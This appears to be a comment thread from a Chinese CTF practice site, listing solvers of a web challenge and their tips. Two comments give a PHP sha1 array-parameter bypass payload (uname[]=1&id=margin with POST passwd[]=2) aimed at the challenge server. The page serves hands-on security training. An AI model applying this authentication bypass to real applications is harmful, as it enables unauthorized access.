评分(4)
解题动态
不会Reverse的玖 攻破了该题 1小时前
baixiaobaiqwq 攻破了该题 1小时前
auroraSEA 攻破了该题 1小时前
HARUMIZU 攻破了该题 1天前
Sonetto 攻破了该题 1天前
零零凌ling 攻破了该题 1天前
hyj11125 攻破了该题 1天前
yansuochitangliu 攻破了该题 1天前
ethicalpaws 攻破了该题 1天前
Ash_1070 攻破了该题 2天前
violet06 攻破了该题 2天前
yuesheng#1 攻破了该题 2天前
sqwq 攻破了该题 2天前
cainiao看简介 攻破了该题 3天前
记得开心一点 攻破了该题 3天前
加菲猫 攻破了该题 3天前
权汁味 攻破了该题 4天前
咕噜灵波 攻破了该题 4天前
AzKanna 攻破了该题 4天前
评论
lysandria 3年前
举报
bp可以
⎝离线网警⎠ 3年前
举报
bp要加个头部 Content-Type: application/x-www-form-urlencoded
spiritboy 3年前
举报
说bp不行的记得改成post方法,然后id那个字段用urlencode
zsmj 3年前
举报
else if (sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin')) 构造payload: uname[]=1&id=margin 使用hackbar 同时传入post参数 passwd[]=2 即可满足上述条件 数组比较sha1相等。
Epiphany777 3年前
举报
uname!=passwd 但 sha1($_GET['uname']) === sha1($_POST['passwd'])&($_GET['id']=='margin') http://114.67.175.224:10336/?uname[]=1&id=margin passwd[]=2
snickerX 3年前
举报
有点小复杂,加上hackbar收费了,建议postman
HuangYanQwQ 3年前
举报
hackbarV2免费
Licapule 3年前
举报
burpsuite 得不到flag,实在找不到别的方法可以直接在控制台用AJAX
Inf0 3年前
举报
rnm 退钱
yafoolaw 3年前
举报
返回404,是不是可以退钱
树木有点绿 4年前
举报
easy